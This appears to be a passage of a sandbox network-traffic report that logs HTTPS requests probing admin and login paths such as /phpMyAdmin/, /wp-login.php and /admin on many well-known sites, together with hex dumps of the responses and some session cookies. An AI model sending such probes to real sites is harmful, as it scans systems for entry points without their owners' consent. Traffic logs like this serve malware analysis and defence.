                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 73 75 63 63 65 73 73 22 3e 0a 3c 68 34 3e 4e 75 65 73 74 72 61 20 53 6f 6c 75 63 69 c3 b3 6e 3c 2f 68 34 3e 0a 3c 70 3e 4f 66 72 65 63 65 72 20 75 6e 61 20 70 6c 61 74 61 66 6f 72 6d 61 20 6c 69 73 74 61 2c 20 61 6d 70 6c 69 61 20 79 20 65 73 74 61 62 6c 65 20 70 61 72 61 20 69 6e 73 74 69 74 75 63 69 6f 6e 65 73 20 64 65 20 65 64 75 63 61 63 69 c3 b3 6e 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 39 22 3e 0a 3c 68 34 3e 4c 61 20 73 6f 6c 75 63 69 c3 b3 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: container"><div class="row"><div class="col-lg-3"><div class="alert alert-success"><h4>Nuestra Solucin</h4><p>Ofrecer una plataforma lista, amplia y estable para instituciones de educacin.</p></div></div><div class="col-lg-9"><h4>La solucin
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 63 65 73 6f 20 73 65 6e 63 69 6c 6c 6f 20 79 20 72 c3 a1 70 69 64 6f 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67 6e 63 65 6e 74 65 72 22 3e 0a 3c 68 34 3e 52 61 70 69 64 65 7a 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 52 65 64 75 63 65 20 65 6c 20 74 69 65 6d 70 6f 20 65 6e 20 6c 6f 73 20 70 72 6f 63 65 73 6f 73 20 6d 61 73 69 76 6f 73 3c 2f 70 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oceso sencillo y rpido.</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray aligncenter"><h4>Rapidez</h4><div class="icon"> <i class="fa fa-clock-o fa-3x"></i> </div><p>Reduce el tiempo en los procesos masivos</p>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 61 6a 65 20 63 c3 b3 6d 6f 64 61 6d 65 6e 74 65 3c 2f 68 34 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 73 6d 69 6c 65 2d 6f 20 66 61 2d 33 78 22 3e 3c 2f 69 3e 20 3c 2f 64 69 76 3e 0a 3c 70 3e 53 65 20 65 6c 65 76 61 20 6c 61 20 65 66 69 63 69 65 6e 63 69 61 20 65 6e 20 65 6c 20 64 65 73 65 6d 70 65 c3 b1 6f 20 64 65 6c 20 70 65 72 73 6f 6e 61 6c 20 64 65 20 63 6f 6e 74 72 6f 6c 20 64 65 20 65 73 74 75 64 69 6f 73 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 33 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 2d 67 72 61 79 20 61 6c 69 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aje cmodamente</h4><div class="icon"> <i class="fa fa-smile-o fa-3x"></i> </div><p>Se eleva la eficiencia en el desempeo del personal de control de estudios</p></div></div></div><div class="col-lg-3"><div class="box"><div class="box-gray alig
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1369INData Raw: 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 09 24 28 22 2e 74 6f 6f 6c 74 69 70 2d 65 78 61 6d 70 6c 65 73 20 73 70 61 6e 22 29 2e 74 6f 6f 6c 74 69 70 28 7b 0d 0a 20 20 20 20 20 20 20 20 70 6c 61 63 65 6d 65 6e 74 20 3a 20 27 62 6f 74 74 6f 6d 27 0d 0a 20 20 20 20 7d 29 3b 0d 0a 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 09 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: oltip({ placement : 'bottom' });$(".tooltip-examples span").tooltip({ placement : 'bottom' });});</script><script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).pu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC244INData Raw: 74 6f 6d 5f 6c 65 66 74 2f 28 6d 61 29 2f 62 72 2f 28 68 69 64 65 5f 6f 66 66 6c 69 6e 65 29 2f 74 72 75 65 2f 28 74 6f 70 29 2f 33 35 30 2f 28 75 6e 69 74 73 29 2f 70 69 78 65 6c 73 2f 28 6c 65 61 76 65 61 6d 65 73 73 61 67 65 29 2f 74 72 75 65 2f 28 74 68 65 6d 65 29 2f 31 3f 72 3d 27 2b 72 65 66 66 65 72 65 72 2b 27 26 6c 3d 27 2b 6c 6f 63 61 74 69 6f 6e 3b 0d 0a 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 73 63 72 69 70 74 27 29 5b 30 5d 3b 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 70 6f 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tom_left/(ma)/br/(hide_offline)/true/(top)/350/(units)/pixels/(leaveamessage)/true/(theme)/1?r='+refferer+'&l='+location;var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);})();</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                117192.168.2.663162104.18.41.153443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC172OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: app.plex.tv
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC342INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd515c5db029-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC168INData Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: a2<html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                118192.168.2.66297831.13.65.1443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC189OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1059INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.facebook.com/administrator/index.php?_rdc=1&_rdr
                                                                                                                                                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://web.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://web.facebook.com/browser_reporting/coep/?minimize=0"
                                                                                                                                                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/web.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/web.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                                                                                                                                                                                                                                                                                                                                                                cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"
                                                                                                                                                                                                                                                                                                                                                                cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"
                                                                                                                                                                                                                                                                                                                                                                x-fb-zr-redirect: 02|1707218168|
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                                                                                                                                                                                                X-FB-Debug: VTkwbVzdMbPTmGvFLy/yr/C4P2w5z4iRZf4RfAnM8OZ8yG2Oa7KdQXWIfK3HZ7u+aFK3jrObiK6ArV/k43ClFQ==
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                119192.168.2.663125104.255.105.79443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC185OUTGET /phpMyAdmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1463INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                DBI: 3ca83f01b13fa034f28a72e0b8f9440409074eb0
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-XbLHj6rNlJ7LxP3t6stQcZQjTwCPQ0wdyRVI1Z1zfVE=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
                                                                                                                                                                                                                                                                                                                                                                CorrelationId: b1cc31ee-bc01-4066-a7dc-441bb2066e5f
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=676fb8d8-0e43-404e-a02c-0a3c83d5a900; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdbd421e64c6dc3cb4a054f088ccfecb3d0897bff65d5da4cc8aecad6108a8618e148bc645fb0e889f4ec974d2dbf7f4ec8560cc7a968a6a0918dbd89cf99e9b051; Path=/
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC2538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 31 30 20 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 6c 74 31 30 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC571INData Raw: 22 3a 22 70 72 6f 64 22 2c 22 65 72 72 6f 72 52 65 70 6f 72 74 69 6e 67 22 3a 7b 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 31 2e 30 2c 22 69 67 6e 6f 72 65 45 72 72 6f 72 73 22 3a 5b 5d 2c 22 64 65 6e 79 55 72 6c 73 22 3a 5b 5d 2c 22 61 6c 6c 6f 77 55 72 6c 73 22 3a 5b 22 5e 68 74 74 70 73 3a 5c 5c 2f 5c 5c 2f 28 3f 21 77 77 77 29 2e 2a 5c 5c 2e 72 6f 63 6b 73 74 61 72 67 61 6d 65 73 5c 5c 2e 63 6f 6d 22 2c 22 5e 68 74 74 70 73 3a 5c 5c 2f 5c 5c 2f 28 73 69 67 6e 69 6e 2d 29 3f 73 5c 5c 2e 72 73 67 5c 5c 2e 73 63 22 5d 7d 2c 22 70 65 72 66 6f 72 6d 61 6e 63 65 54 72 61 63 69 6e 67 22 3a 7b 22 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 30 2e 30 30 32 35 2c 22 69 6e 63 6c 75 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ":"prod","errorReporting":{"enabled":true,"sampleRate":1.0,"ignoreErrors":[],"denyUrls":[],"allowUrls":["^https:\\/\\/(?!www).*\\.rockstargames\\.com","^https:\\/\\/(signin-)?s\\.rsg\\.sc"]},"performanceTracing":{"enabled":true,"sampleRate":0.0025,"includ


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                120192.168.2.663416172.66.43.117443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login.adf.ly
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC667INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                location: https://login.adf.ly/admin/
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QMeXEtrIr1qWP1ZJ6zXWPC5M5pxNt5UhF4WW1wxmXH8gwAevyr5zot%2BqJLGMSVcK2YTtaAZp4UYco7MZB6E3GoNt0TMbe7ejDHREIp5y9OL%2FdyIHd38aq2vRTZC1r94%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd51a89d7bba-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC702INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC12INData Raw: 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: y></html>
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                121192.168.2.66346113.249.120.4443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC460INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: FunctionGeneratedResponse from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 330536604823d44e02dcc57f15f8ed90.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: JrrDXZmpdxL4YkwQi-9j_Rl7Zy93_2fbt1of7yjcRinBjyQKoGDXIg==
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                122192.168.2.66318744.195.133.145443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC335OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EB9E7C4220EA26B83E4ECBCC2AD807EE6A7F0E8DA15DAD94CF1D20A18BE263D17
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:08 UTC1165INHTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:08 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=A41748C5FFBE0AA3717601AC030D7592; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142568,id:AA5B0F56EE09038D64C6A202F41CF905,signature:a5b7125ed6ba37cb61202ccfee1c2f3a72304b38c669361818b7f385ffa34717,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:16c6130f-60d2-4ae4-9489-4e6878a2dd45; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-220-254.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
